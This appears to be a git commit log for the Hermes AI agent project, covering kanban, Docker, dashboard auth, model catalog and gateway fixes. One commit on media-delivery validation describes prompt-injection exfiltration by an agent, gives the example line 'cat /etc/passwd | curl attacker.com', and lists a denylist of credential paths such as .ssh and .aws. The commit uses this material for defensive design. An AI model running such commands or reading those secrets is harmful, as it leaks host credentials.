Teknium	69b74c15a3	fix(kanban): CLI dispatch honors max_in_progress/max_spawn from config; swap missing 'avoid-ai-writing' skill for bundled humanizer (#33488 , #29415 ) (#34337 ) Two small bugs in the kanban dispatcher's CLI surface that were silently degrading two distinct workflows. Bundled because the test files and the surrounding code surface overlap. ## #33488: hermes kanban dispatch ignored kanban.max_in_progress / max_spawn The CLI wrapper in hermes_cli/kanban.py:_cmd_dispatch only passed default_assignee and max_in_progress_per_profile through to dispatch_once. The global concurrency cap (kanban.max_in_progress) and the per-tick spawn limit (kanban.max_spawn) were silently dropped, so operators using 'hermes kanban dispatch' as a one-shot or in a custom loop couldn't reach either cap from config — only the gateway embedded dispatcher honored them. Fix: read both keys from config in the same coerce-positive-int helper that already handled max_in_progress_per_profile. CLI --max still wins over config kanban.max_spawn when both are present (explicit operator signal beats default), but absent --max falls back to config. ## #29415: synthesizer crashed in retry loop on missing skill hermes_cli/kanban_swarm.py:212 hardcoded skills=['avoid-ai-writing'], a skill that doesn't exist in the bundled skills/ directory or any registered hub source. Every synthesizer worker spawn failed at CLI startup with 'Unknown skill(s): avoid-ai-writing' before the agent loop even started — the dispatcher retried up to failure_limit (default 2), then auto-blocked the task, then dependency rules could re-promote it, looping forever until manual intervention. Fix: replace with 'humanizer' which is bundled at skills/creative/humanizer/SKILL.md (description: 'Humanize text: strip AI-isms and add real voice'). That's the obvious intent behind the 'avoid-ai-writing' name, and the skill is platform-portable (linux/macos/windows) so it works on every supported runtime. ## Tests tests/hermes_cli/test_kanban_cli_dispatch_passthrough.py — 4 cases: - CLI passes max_in_progress / max_spawn / default_assignee / max_in_progress_per_profile from config to dispatch_once - CLI --max flag overrides config kanban.max_spawn - Invalid cap values (0, -1, 'abc', '1.5') silently fall through to None - kanban_swarm.py no longer references 'avoid-ai-writing' AND the replacement 'humanizer' skill exists at the expected on-disk path Kanban suite: 468/468 pass (was 464; +4 new regression tests).	2026-05-28 21:00:46 -07:00
Ben	a618789dba	fix(dashboard-auth): share /api/* public allowlist between legacy and OAuth gates Two parallel public-path allowlists drifted: _PUBLIC_API_PATHS in hermes_cli/web_server.py (legacy _SESSION_TOKEN middleware) and _GATE_PUBLIC_PREFIXES in hermes_cli/dashboard_auth/middleware.py (OAuth gate). The legacy list included /api/status (documented as a non-sensitive read-only liveness target); the OAuth gate's list did not. Effect: every wildcard-subdomain agent surfaced as STARTING/down to the portal even though the dashboard was serving correctly. Nous account service (src/server/agents/fly-provider.ts getInstanceRuntimeStatus) fetches ``/api/status`` without a cookie as its sole liveness probe; the OAuth gate's 401 looked identical to 'agent dead' on the portal side. Fix: lift the allowlist into hermes_cli/dashboard_auth/public_paths.py and have both middlewares import it. _path_is_public now consults the shared frozenset first, then falls back to the gate's auth-bootstrap/static prefix list. Future additions to the public list hit both gates automatically. Endpoint inventory (verified safe to remain public): * /api/status — version, gateway state, active session count, auth-gate shape. Portal liveness probe target. * /api/config/defaults — config-defaults feed for the SPA's Config page * /api/config/schema — config schema for the SPA's Config page * /api/model/info — model catalogue metadata (context windows) * /api/dashboard/themes — theme manifests for the skin engine * /api/dashboard/plugins — plugin manifests for the dashboard No user data, no session content, no secrets. Same shape an external monitoring agent would hit on /healthz. Tests: * New: test_gated_status_is_public (regression guard with the NAS fly-provider.ts liveness-probe rationale spelled out in the docstring) * New: test_other_public_api_paths_are_public_under_gate (parametrised over the rest of PUBLIC_API_PATHS — proves 401 / 302-to-login is never the response) * New: docker integration check #3 in test_dashboard_oauth_gate_engaged_by_default — /api/status remains 200 under the gate AND reports auth_required=True so the portal can distinguish modes * Updated: test_full_login_round_trip_unlocks_gated_api now probes /api/sessions instead of /api/status (status is public, so it can no longer distinguish 'logged in' from 'gate accidentally disabled') * Updated: TestApi401Envelope (the no-cookie / invalid-cookie / dead-cookie tests) probes /api/sessions for the same reason * Updated: docker integration check #2 in test_dashboard_oauth_gate_engaged_by_default probes /api/sessions to prove the gate is intercepting * Removed: dead _login() helper in test_dashboard_auth_status_endpoint.py (no longer needed since /api/status is reachable cold) Companion to docs/handover/hermes-agent-dashboard-s6-insecure-fix.md (the --insecure flag fix that shipped earlier).	2026-05-29 12:17:12 +10:00
Teknium	3b6347af15	feat(kanban): default_assignee fallback + per-profile concurrency cap (#27145 , #21582 ) (#34244 ) Two related dispatcher behaviors that have been missing for a while. ## kanban.default_assignee (#27145) Reporter (@agarzon): dashboard creates a task without an assignee, task parks in 'ready' forever even though the operator's intent ('default') is perfectly clear. The dispatcher already had a 'skipped_unassigned' bucket but no fallback routing — users had to manually type 'default' in the assignee field every time. Behavior: when 'kanban.default_assignee' is set in config.yaml, the dispatcher applies that assignee to any unassigned ready task before deciding whether to spawn. The row is mutated (assignee column + an 'assigned' event with source='kanban.default_assignee' for the audit trail). Empty/whitespace config value = no fallback, preserving the existing skipped_unassigned behavior. Dry-run mode reports what WOULD happen via the new 'auto_assigned_default' bucket on DispatchResult, but does NOT mutate the DB — operators using 'hermes kanban dispatch --dry-run' see the routing decision before committing. ## kanban.max_in_progress_per_profile (#21582) Reporter (@edwardchenchen, @simlu, 4 reactions): fan-out workloads saturate one profile's local model / API quota / browser pool while other profiles sit idle. The existing global 'max_in_progress' caps total workers but doesn't balance across profiles. Behavior: when 'kanban.max_in_progress_per_profile' is set to a positive int, the dispatcher tracks per-assignee running counts (one query at tick start) and refuses to spawn for any assignee already at the cap. Tasks blocked this way go to a new 'skipped_per_profile_capped' bucket on DispatchResult as (task_id, assignee, current_running_count) tuples — NOT an operator-actionable failure, just 'try again next tick when the profile has capacity'. Pre-existing 'running' tasks count against the cap (verified via regression test). The cap respects dry_run mode by incrementing its in-memory counter on each would-be spawn so dry_run reports the same balanced subset that a real tick would. Invalid cap values (0, negative, non-int, None) are treated as 'no cap', preserving the existing behavior. Backward-compatible for installs that don't set the config. ## Surfaces - 'hermes kanban dispatch' CLI now prints 'Auto-assigned to kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap, N running): ...' lines, plus matching JSON keys in --json output. - Gateway dispatcher logs the configured values at startup ('default_assignee=X', 'max_in_progress_per_profile=N'). - 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with inline docs. ## Validation - tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap baseline, auto-assign + DB mutation, dry-run reports without mutating, whitespace treated as None, explicit assignees untouched, DispatchResult field schema. - tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including 4 parametrized): no-cap baseline, balanced 2-profile fan-out, pre-existing running counts against cap, invalid cap values (0/-1/'abc'/None), capped tasks dispatched on next tick after running task completes, DispatchResult field schema. - Broader kanban suite: 464/464 pass (was 449 baseline; +15 new regression tests across both features). ## Credit #27145 — Jimmy Johansson reported the dispatcher skipped-unassigned gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix that matches the existing config knob. #21582 — @edwardchenchen filed the per-profile cap ask after hitting model 429s on fan-out research projects; @simlu confirmed the same pain on local-model setups.	2026-05-28 19:02:55 -07:00
Ben	d77d877665	fix(docker): startup orphan reaper for crashed-process containers The cleanup-fix in the previous commit handles the graceful-exit leak: a Hermes process that runs ``atexit`` will now actually wait on the docker stop/rm worker thread, so containers either survive (persist mode) or are fully removed (opt-out mode) by the time the interpreter exits. But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window close. Containers from those exits stay parked with no surviving Python process to reuse or remove them, so they accumulate until the operator intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class — there's no live cleanup() to fix. This commit adds the safety net: a startup orphan reaper that runs once per Hermes process and removes long-Exited hermes-labeled containers that the prior commit couldn't reach. Implementation: * New ``reap_orphan_containers()`` in ``tools/environments/docker.py``. Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional) ``label=hermes-profile=<current>``. Per-container ``docker inspect`` parses ``State.FinishedAt`` (with nanosecond-precision trimming for Python's microsecond-bound ``fromisoformat``); containers older than the threshold get ``docker rm -f``'d. The ``status=exited`` filter is load-bearing — a running container may belong to a sibling Hermes process whose reuse path will pick it up; killing it would crash the sibling mid-command. Single-container failures are logged and the sweep continues to the next candidate. * New ``_maybe_reap_docker_orphans()`` helper in ``tools/terminal_tool.py``. Wired into ``_create_environment()`` for ``env_type == "docker"``. Gated by: - ``terminal.docker_orphan_reaper: true`` (default; opt-out for operators running multiple Hermes processes in the same profile who don't trust the conservative defaults) - ``_docker_orphan_reaper_ran`` module flag with double-checked locking — parallel subagents and RL rollouts don't trigger N concurrent docker ps storms - Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor (so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own setup) - Profile scoping — a research profile NEVER reaps the default profile's stragglers - Exception swallow — a janitor failure must never block container creation * New config ``terminal.docker_orphan_reaper`` wired through all four config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py, tests/conftest.py) and pinned by ``test_docker_orphan_reaper_is_bridged_everywhere``. Coverage: * 9 new unit tests in test_docker_environment.py — happy path, recent- container sparing, profile scoping, unparseable-timestamp safety, docker-ps-failure handling, partial-failure continuation, nanosecond timestamp parsing, zero-value FinishedAt rejection. * 6 new integration tests in test_docker_orphan_reaper_integration.py — once-per-process gate, disable-flag respected, lifetime doubling with 60s floor, current-profile filter wiring, exception swallow. * 1 new bridge-invariant regression test. Closes #20561 (combined with the two prior commits on this branch).	2026-05-29 11:49:54 +10:00
Ben	ac8e238bc8	fix(docker): reuse containers across processes + fix cleanup leaks The Docker backend docs claim "Single persistent container — ONE long- lived container shared across sessions, /new, /reset, and delegate_task subagents. Stopped/removed on shutdown." In practice the code only honored that contract within a single Python process via the in-memory \`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation spawned a fresh \`hermes-<hex>\` container; older containers piled up in \`Exited\` state and accumulated until manual \`docker rm\` (issue #20561). Three root causes, all addressed by this commit: 1. No cross-process container discovery. 2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\` which raced with parent-process exit — when Python exited promptly the detached shell child got killed mid-\`docker stop\`, leaving stopped containers behind. 3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\` (the bind-mount-persistence flag). Default config sets \`container_persistent: true\`, so the default happy path skipped \`rm\` entirely — even when the user explicitly didn't want cross-process reuse, containers leaked. Fix: * Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When true, init probes \`docker ps -a --filter label=hermes-agent=1 --filter label=hermes-task-id=<task> --filter label=hermes-profile=<profile>\` and reuses a matching container (running → attach; stopped → \`docker start\` → attach; \`docker start\` failure → fall through to a fresh \`docker run\`). Multiple matches prefer the running one, with the stragglers left for the orphan reaper (next commit) to clean up. * Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The \`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs whenever \`persist_across_processes\` is false, regardless of the bind-mount-persistence setting. The leak class is gone in all combinations. * Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit hook calls this on every active env, blocking up to 15s for the cleanup thread before interpreter exit. Without this, \`hermes /quit\` raced the daemon-thread teardown and dropped the stop/rm work. * New config \`terminal.docker_persist_across_processes\` (default \`true\` — restores the documented contract). Set \`false\` for hard per-process isolation. Wired through all four config-bridge sites (cli.py env_mappings, gateway/run.py _terminal_env_map, hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip list); regression-pinned by \`test_docker_persist_across_processes_is_bridged_everywhere\` matching the existing pattern for docker_run_as_host_user / docker_env. Reuse intentionally does NOT compare image / mounts / resources — only the labels. Operators changing those settings should set \`docker_persist_across_processes: false\` (or \`docker rm -f\` the labeled container) to force a fresh start. This keeps the probe cheap and the failure mode obvious. Coverage: 12 new unit tests in tests/tools/test_docker_environment.py covering reuse paths (running, stopped, fallback, opt-out, duplicate preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm, no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one config-bridge regression pin. Refs #20561	2026-05-29 11:49:54 +10:00
Teknium	e71a2bd11b	chore: release v0.15.1 (2026.5.29) (#34222 )	2026-05-28 18:11:49 -07:00
Teknium	3a9bc9d88a	fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867 ) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain _API_KEY / _TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.	2026-05-28 11:33:16 -07:00
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	0c859a1c04	chore: release v0.15.0 (2026.5.28) (#34008 ) * chore: release v0.15.0 (2026.5.28) The Velocity Release. Run_agent.py refactor (16k→3.8k LOC, -76%), kanban grows into a multi-agent platform (104 PRs), cold-start perf wave continues (-240ms / -47% per-turn function calls / -195ms per tool call), session_search rebuilt (4500x faster, no LLM), promptware defense lands, Bitwarden Secrets Manager integration, two new image_gen providers (Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill, ntfy as 23rd messaging platform, deep xAI integration round. 15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors. * chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject)	2026-05-28 10:45:33 -07:00
kshitij	1a74795735	feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003 ) Anthropic released Claude Opus 4.8 on 2026-05-27, available on OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS: - https://openrouter.ai/anthropic/claude-opus-4.8 - https://openrouter.ai/anthropic/claude-opus-4.8-fast The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast) priced at 2x of the base model — a notable improvement over the 6x premium on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request parameter like Opus 4.6; Anthropic's native fast-mode beta still only covers Opus 4.6. Changes: hermes_cli/models.py - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to the OpenRouter fallback snapshot and the Nous Portal curated list (live catalogs surface them automatically when reachable; the fallback list matters when the manifest fetch fails). - Add claude-opus-4-8 to the Anthropic-native picker list. agent/model_metadata.py - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS with 1M tokens (matches 4.6/4.7). agent/anthropic_adapter.py - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the Opus 4.7 API contract: adaptive thinking only, xhigh effort level supported, sampling parameters (temperature/top_p/top_k) return 400. - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output, same as 4.7). Matches by substring so claude-opus-4-8-fast and date-stamped variants resolve correctly. agent/usage_pricing.py - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50 cache read, $6.25 cache write (same as 4.6/4.7). - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00 cache read, $12.50 cache write. Per OpenRouter, the 2x premium is the only differentiator from regular Opus 4.8. - OpenRouter routes still pull pricing from the live /models API, so no static OpenRouter entry is needed. tests/agent/test_model_metadata.py - Extend the Claude 4.6+ context-length tag list with 4.8/4-8. website/static/api/model-catalog.json - Regenerated via `python scripts/build_model_catalog.py` to pick up the new entries in the OpenRouter and Nous Portal fallback lists. E2E verification (isolated sys.path import against the worktree): - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params all return True for claude-opus-4.8 and claude-opus-4.8-fast. - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays False for 4.8 — fast mode is a separate model ID on OpenRouter, not a parameter Anthropic accepts on the base model. - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations. - resolve_billing_route + _lookup_official_docs_pricing resolve the correct $5/$25 (regular) and $10/$50 (fast) pricing for both dot-notation and dash-notation inputs. - 4.7 and 4.6 regression: behavior unchanged. Unit tests: 305 passed across tests/agent/test_usage_pricing.py, test_model_metadata.py, tests/hermes_cli/test_model_catalog.py, test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.	2026-05-28 10:31:59 -07:00
kshitij	a82c88bac0	fix(xai-oauth): accept bare-code manual paste (state=None) (#26923 ) (#33880 ) xAI's consent page renders the authorization code in-page rather than redirecting through the 127.0.0.1 callback, so on remote/headless setups (GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only value the user can paste is the opaque code with no `code=`/`state=` query parameters. `_parse_pasted_callback` correctly returns `state=None` for that input, but `_xai_oauth_loopback_login` then validated state unconditionally and raised `xai_state_mismatch`, making the documented bare-code paste path unreachable. PKCE (code_verifier) still binds the token exchange to this client, so the local state-equality check is redundant when there is no state to compare. On the manual-paste path only, substitute the locally generated state when the callback returned none — the rest of the validation chain (code presence, error field, token exchange) is unchanged. The loopback HTTP-server path still requires a matching state (a real browser redirect always carries one). Also: clarify the manual-paste prompt to mention xAI's in-page code rendering so users know pasting the bare code on its own is expected. Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20). Tests ----- * test_xai_loopback_login_manual_paste_bare_code_succeeds — positive end-to-end through the token exchange with state=None. * test_xai_loopback_login_loopback_path_rejects_missing_state — the HTTP-server path still rejects state=None as a regression guard (the bare-code relaxation must NOT widen the loopback path). * Existing test_xai_loopback_login_manual_paste_state_mismatch_raises continues to verify wrong (non-None) state is rejected on manual-paste. Closes #26923.	2026-05-28 05:47:30 -07:00
Teknium	e0572a6def	fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810 ) `hermes skills search` rendered the Identifier column with the default overflow behaviour, so long slugs (notably browse-sh — every browse-sh skill ends in a `-XXXXXX` hash that's part of the identifier) were cut to `browse-sh/weathe…`. Users copied the visible string into `hermes skills install` and got a not-found error because the hash was gone. Set overflow="fold" on the Identifier column in both search tables (`do_search` and the `_resolve_short_name` multi-match table) so long slugs wrap onto a second line instead of getting eaten. Also add a `--json` flag to `hermes skills search` (and the `/skills search` slash variant) for scripting — emits a list of {name, identifier, source, trust_level, description} objects with the full identifier, which is the right shape for copy-paste pipelines too. Closes #33674.	2026-05-28 04:53:13 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	6f9182cb34	fix(kanban): content-addressed corrupt-DB backup filename Repeated quarantines of an unchanged corrupt kanban.db used to amplify disk usage by N: the gateway dispatcher's 5-minute retry loop, multi- profile fleets sharing one DB, and manual reopen attempts each produced a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10 retries on a 100KB DB you had 11x the disk footprint of duplicate corrupt data. Derive the backup filename from a sha256 of the main DB instead of a timestamp + collision counter. Same bytes → same filename → skip the copy on retries. Different bytes (partial repair, further damage) → different filename → preserve separately. Sidecar (-wal/-shm) backups inherit the same content-addressed name. Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop the persistent JSON marker file, drop the atomic temp+fsync+rename helper (shutil.copy2 is fine for a quarantine-only path), drop the gateway-side WAL/SHM fingerprint extension (the existing (path, mtime, size) tuple still gives the 5-minute retry semantics it needs), and drop the gateway-side helper extraction. The backup file existing IS the marker; no separate state needed. Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup proves 10 retries on the same corrupt bytes produce 1 backup (was 11), and mutating the corrupt bytes produces a second backup with a different fingerprint. Refs #33529 Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>	2026-05-28 03:38:09 -07:00
Teknium	432a691758	fix(update): stream + idle-kill `npm run build` so a stalled webui-build can't soft-brick the install (#33803 ) `hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands after `pip install -e .` has already touched the install but before the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384). Changes: - New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update. - `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract. - Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step. Tests: - `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests. - `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step. - `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update. Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed. Fixes #33788.	2026-05-28 03:34:47 -07:00
Teknium	10ee4a729b	fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798 ) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778.	2026-05-28 